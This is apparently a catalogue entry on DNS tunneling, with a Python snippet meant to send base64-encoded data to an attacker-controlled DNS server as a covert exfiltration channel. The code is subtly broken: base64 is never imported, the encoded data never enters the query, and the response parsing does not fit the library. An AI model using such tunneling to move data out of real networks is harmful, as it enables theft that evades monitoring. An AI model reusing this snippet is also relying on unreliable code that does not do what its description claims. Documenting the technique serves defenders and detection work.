(Python) DNS Tunneling by Thomas Roccia
Created the Tuesday 13 December 2022. Updated 12 months ago.
This code uses the dnslib and socket modules to encode the specified data as a base64 string and send it as a DNS query to the specified DNS server. The DNS query uses the domain name and subdomain that the attacker controls, with the encoded data as the subdomain label. The code then receives a DNS response from the server, decodes the data payload, and prints it.
import dnslib import socket # Replace with the IP address of the DNS server dns_server = "188.8.131.52" # Replace with the domain name and subdomain that you control domain_name = "example.com" subdomain = "tunnel" # Replace with the data that you want to transfer data = b"hello" # Encode the data as a base64 string encoded_data = base64.b64encode(data) # Create a DNS query with the encoded data as the subdomain label query = dnslib.DNSRecord.question(subdomain + "." + domain_name) # Send the DNS query to the DNS server dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) dns_socket.sendto(query.pack(), (dns_server, 53)) # Receive the DNS response from the DNS server response = dnslib.DNSRecord.parse(dns_socket.recv(4096)) # Decode the DNS response and extract the data payload decoded_data = base64.b64decode(response.rr.rdata.label) # Print the decoded data print(decoded_data)